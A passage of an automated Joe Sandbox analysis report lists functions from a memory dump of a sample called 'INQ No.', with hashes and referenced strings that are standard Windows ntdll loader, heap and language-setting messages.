                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                                                            • Opcode ID: 4800d687aa0a93a5a3cdeeff3643a33bf75c43e9624ead302dcdb5b1cb7bd496
                                                                                                                                                                            • Instruction ID: e57ad09fe2e46063b748a9c81619a5c75ca979a2ec68dd88309b8b30bff985f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 4800d687aa0a93a5a3cdeeff3643a33bf75c43e9624ead302dcdb5b1cb7bd496
                                                                                                                                                                            • Instruction Fuzzy Hash: 9171CF71A002099FCB18EF68CE86ABEB7F4EF44714F18416DE942E7252E734AD41EB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                                                            • Opcode ID: 5fe4f89773498a3656314f87ed0cbe4306253ed54940834d5438fc4ffaa380e0
                                                                                                                                                                            • Instruction ID: 71fdd4759cdab051652851502495b762e6fecafdcc76732a1dc1972142bbb73c
                                                                                                                                                                            • Opcode Fuzzy Hash: 5fe4f89773498a3656314f87ed0cbe4306253ed54940834d5438fc4ffaa380e0
                                                                                                                                                                            • Instruction Fuzzy Hash: F161E070600749DFDB28CF29C841B6ABBE2FF44714F249469E449EF292D7B0E881DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 00F482DE
                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 00F482D7
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F482E8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                                                            • Opcode ID: dbdac1eab621711fae74299a6f1330c0e052ce61d1f9e86b286aa701aedd08c6
                                                                                                                                                                            • Instruction ID: 4432989685edaedbc906314e530bc7eff1d2744cdb4300a8dc9a0e42219d4838
                                                                                                                                                                            • Opcode Fuzzy Hash: dbdac1eab621711fae74299a6f1330c0e052ce61d1f9e86b286aa701aedd08c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F41C471544308ABC721EB64DE46F5B7BE8EF44760F04462AF944E72A1EB74D800BBD1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F8C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • @, xrefs: 00F8C1F1
                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00F8C1C5
                                                                                                                                                                            • PreferredUILanguages, xrefs: 00F8C212
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                                                            • Opcode ID: 8c259a8967c8fd724843c92f321728882816b590fd44308390e36a122ade3594
                                                                                                                                                                            • Instruction ID: 95471275485aad84afa0356b8dd77f1a2ef981f33a403f02f4c31af6abb3dcc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c259a8967c8fd724843c92f321728882816b590fd44308390e36a122ade3594
                                                                                                                                                                            • Instruction Fuzzy Hash: B8416D72E00219EBDF11EBD4C891FEEB7B8AB54710F14416AEA05F7280D7749E44EBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F64144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                                                            • Opcode ID: 5e77feba4756e9632e8c41c6887921a8f00c38f8b7332014f4d97d5d62444614
                                                                                                                                                                            • Instruction ID: 0eba931f467727c3916735fe948097a015a53e1f533abd9e171b97d6fccc6aab
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e77feba4756e9632e8c41c6887921a8f00c38f8b7332014f4d97d5d62444614
                                                                                                                                                                            • Instruction Fuzzy Hash: 17412632D042588BDB22EBE5C854BADBBF8FF46350F250459E901FB782D734A941EB11
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F54755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00F54899
                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 00F5488F
                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00F54888
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                                                            • Opcode ID: a10e9128c05d585a0ad274210347a0041e749aab78cacbd19081047d6fbdd75a
                                                                                                                                                                            • Instruction ID: 46132b326025bb4417e721123c310809387e9e8b0b573730725be6c16ea0cd80
                                                                                                                                                                            • Opcode Fuzzy Hash: a10e9128c05d585a0ad274210347a0041e749aab78cacbd19081047d6fbdd75a
                                                                                                                                                                            • Instruction Fuzzy Hash: A241E232A047509BCB20CF28E940A267BE4AF4D76AB050669EE84D7351D730FC88FB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EDA2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                            • API String ID: 0-405261330
                                                                                                                                                                            • Opcode ID: b2d2babe96010d6fcbff8bb7546c84cd3d29d5d4a9eddde2232172380c8931a9
                                                                                                                                                                            • Instruction ID: 45410b5d7fcfd3a6000ac6e6cbdbbaa79f4ce54be91bfb7e913e0f9840ad94a2
                                                                                                                                                                            • Opcode Fuzzy Hash: b2d2babe96010d6fcbff8bb7546c84cd3d29d5d4a9eddde2232172380c8931a9
                                                                                                                                                                            • Instruction Fuzzy Hash: C241BD31A04649DBCB21CF69C840BAEB7B5FF85724F2850AAE800EB391E375DE01DB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                                                            • Opcode ID: 34e3fce2378f2e6fe78cee42eeed0bfc6bed5f8266aff23f73255991393045f9
                                                                                                                                                                            • Instruction ID: c62593100258ebb6d82f7789f6380fb66ff854a5f8128f5b250a946dc99f6356
                                                                                                                                                                            • Opcode Fuzzy Hash: 34e3fce2378f2e6fe78cee42eeed0bfc6bed5f8266aff23f73255991393045f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 811190313159859FDB28C615C862F69B3A4EF80B25F249119E406EF251DB74ECC1E751
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializationFailure, xrefs: 00F520FA
                                                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 00F520F3
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F52104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                                                            • Opcode ID: a22f2cbe99ae3f5306056afc26d93d145207e9e7fd35c45e3ea06e0ac731dc23
                                                                                                                                                                            • Instruction ID: 23e1227776fe6d73577d687e12201766cf1550de157ae819f50ac96cf36935bd
                                                                                                                                                                            • Opcode Fuzzy Hash: a22f2cbe99ae3f5306056afc26d93d145207e9e7fd35c45e3ea06e0ac731dc23
                                                                                                                                                                            • Instruction Fuzzy Hash: 94F0C271A40708BBD724E748DD57FDB3768EB81B64F140069FB007B281D6B4AA44EA91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: #%u
                                                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                                                            • Opcode ID: 94e2b6501814a6afe7832f45e4d30e3c7364d4b0cca26b7cb175571ad0e1231f
                                                                                                                                                                            • Instruction ID: f2938dc4f0e3317fcfb14d3e0ec4d5c7be628fb86e3fd7fd41f867a6f2e64987
                                                                                                                                                                            • Opcode Fuzzy Hash: 94e2b6501814a6afe7832f45e4d30e3c7364d4b0cca26b7cb175571ad0e1231f
                                                                                                                                                                            • Instruction Fuzzy Hash: 24715972A0014A9FCB11DFA9C985BAEB7F8AF08714F140065E905F7291EA38EE41DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EDC7C0 Relevance: 3.5, Strings: 2, Instructions: 960COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: MUI$\U
                                                                                                                                                                            • API String ID: 0-3971960151
                                                                                                                                                                            • Opcode ID: 87ca09886ed5a1e7c4dd02858a508276693892d1218873a9c1f94427ab5242d9
                                                                                                                                                                            • Instruction ID: 8da9f34a638955e8e446fbac5e055ab213b9e30fc2893048f473da5afffaba69
                                                                                                                                                                            • Opcode Fuzzy Hash: 87ca09886ed5a1e7c4dd02858a508276693892d1218873a9c1f94427ab5242d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 37824B75E042198BDB24CFA9C980BEDB7B1FF48354F24A16AE859BB390D7309D42CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EDA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrResSearchResource Enter, xrefs: 00EDAA13
                                                                                                                                                                            • LdrResSearchResource Exit, xrefs: 00EDAA25
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                                                            • Opcode ID: b6da137ea5c5018758756ee108484688fcc8c8c2f85cdd1447c760c8fbc23e99
                                                                                                                                                                            • Instruction ID: 3c504eecc61d875c6e6a851ef9dcef6c079d0aac6c7017499160bcdcc36ae925
                                                                                                                                                                            • Opcode Fuzzy Hash: b6da137ea5c5018758756ee108484688fcc8c8c2f85cdd1447c760c8fbc23e99
                                                                                                                                                                            • Instruction Fuzzy Hash: 88E17D71E00218ABDB21DAA8C980BEEB7B9EF54324F185137E901F7391D7749E42EB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F9A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `$`
                                                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                            • Instruction ID: 0a2329ae94543aa0cd0f1e46f0798cc457eb34fcd0a18868392e867121cdb147
                                                                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 89C1E3316043419BEF25CF28C841B6BBBE5BFC4328F184A2CF595CA291D775D905EB82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F4E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                                                            • Opcode ID: fde399df11d1cae921bbe15a615dd97fb972b50ced558c906b6ef93a362e0377
                                                                                                                                                                            • Instruction ID: caa8719b7b6ba7d2f90e4b61e0ad70a5ad3d035e4600065d7fa6a10ade525902
                                                                                                                                                                            • Opcode Fuzzy Hash: fde399df11d1cae921bbe15a615dd97fb972b50ced558c906b6ef93a362e0377
                                                                                                                                                                            • Instruction Fuzzy Hash: 26614B72E007189FDB14DFA8C841BAEBBB5FB48710F24406DE959EB291D731AD40EB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$MUI
                                                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                                                            • Opcode ID: 3c9fe3ee2160e45dc8a2253c24794edfa3c744faf2808047e5676e5efb87fe00
                                                                                                                                                                            • Instruction ID: abdeed1482c92df9afbe362274d8d89d057348d6290d52377b9d457e2960f45f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c9fe3ee2160e45dc8a2253c24794edfa3c744faf2808047e5676e5efb87fe00
                                                                                                                                                                            • Instruction Fuzzy Hash: 355178B1E0021DAFDB11DFA4CC81EEEBBB9EB48754F10412AE904B7280D734AE05DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • kLsE, xrefs: 00ED0540
                                                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00ED063D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                                                            • Opcode ID: 1b14dd91018ddd5858ddacca1494320833b90c8bf4d5d08c26910ff9d825ea91
                                                                                                                                                                            • Instruction ID: 6f7a9114cfa7c97efc2dff7020914b9bcdbcb854e2a794082959a5a6a5a5425f
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b14dd91018ddd5858ddacca1494320833b90c8bf4d5d08c26910ff9d825ea91
                                                                                                                                                                            • Instruction Fuzzy Hash: 8651AB715047428BC724EF24C5457A7B7E4EF84308F08683EEAAA97781E770E946CF92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                                                            • Opcode ID: 24236d2d4b665d97747c5e398ae29d3cb5fff363e30e457d22915b6808aa0e69
                                                                                                                                                                            • Instruction ID: feaf135dc02836ccf3ed9a1136cccbb69531361f902737150423584c7d721034
                                                                                                                                                                            • Opcode Fuzzy Hash: 24236d2d4b665d97747c5e398ae29d3cb5fff363e30e457d22915b6808aa0e69
                                                                                                                                                                            • Instruction Fuzzy Hash: 0701A9B2244B04AFD311DF24CE46F2677F8EB85B15F058939A558CB1D0E334E804EB46
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F56420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: a4f33fe2b3d736601993cfdacd9d2e3fada34cf4cb26dc9358d78a65873ab302
                                                                                                                                                                            • Instruction ID: 09dc60985fb54e2a1ee6a013486c81ca0e9c04847cb5b733ca8636790922511b
                                                                                                                                                                            • Opcode Fuzzy Hash: a4f33fe2b3d736601993cfdacd9d2e3fada34cf4cb26dc9358d78a65873ab302
                                                                                                                                                                            • Instruction Fuzzy Hash: 95918FB2A40219ABDB21DFA5CD85FAEB7B8EF04B50F540065FB10FB191D674AD04DBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F7E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: 2490496b0acc8bf2171f1adeae1d096b16802e09408b433caffffe256ae483b6
                                                                                                                                                                            • Instruction ID: 42ea5e74cb3f57d89e6a63fb180cfc906ca30f0182ac96be609c04458a42fd55
                                                                                                                                                                            • Opcode Fuzzy Hash: 2490496b0acc8bf2171f1adeae1d096b16802e09408b433caffffe256ae483b6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F91F232D00608BBDB22ABA1CC45FAFBBB9EF89750F10406BF508A7251DB749901EB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: GlobalTags
                                                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                                                            • Opcode ID: 623b8746001beb1af2191b3c2d9d1c95e1bded212d8465b0729acb048c71142e
                                                                                                                                                                            • Instruction ID: 190dd006e26acb28f6d03fac397d9798cb557ffc6fed8713c237342278cf49df
                                                                                                                                                                            • Opcode Fuzzy Hash: 623b8746001beb1af2191b3c2d9d1c95e1bded212d8465b0729acb048c71142e
                                                                                                                                                                            • Instruction Fuzzy Hash: 97719E75E0020ACFDF28CF98C5916ADBBB1BF59714F24812AE805E7241EB358D41EB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F74978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .mui
                                                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                                                            • Opcode ID: 1f9d85cf264cc94ec82642c7e25d97eba471609d1eb707bf5fdaa2b60392347e
                                                                                                                                                                            • Instruction ID: 2cab8bd1d72d14b2069d4c0c47f842e2997e9ab2171ae784d1ed1e6885444fdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f9d85cf264cc94ec82642c7e25d97eba471609d1eb707bf5fdaa2b60392347e
                                                                                                                                                                            • Instruction Fuzzy Hash: E9519172D402299BDB10DF99D840BAEB7B4EF48B10F05812BE915BB251D738AD01EFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EEE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: EXT-
                                                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                                                            • Opcode ID: b9f0e0723f460592fae8db61c6d1e3cf651713dac0740dd33a174a02e3b26736
                                                                                                                                                                            • Instruction ID: 4ff2ed8411982af730f8c0d239bc97f32f9cc0134cbfce66f65d0186576b4fce
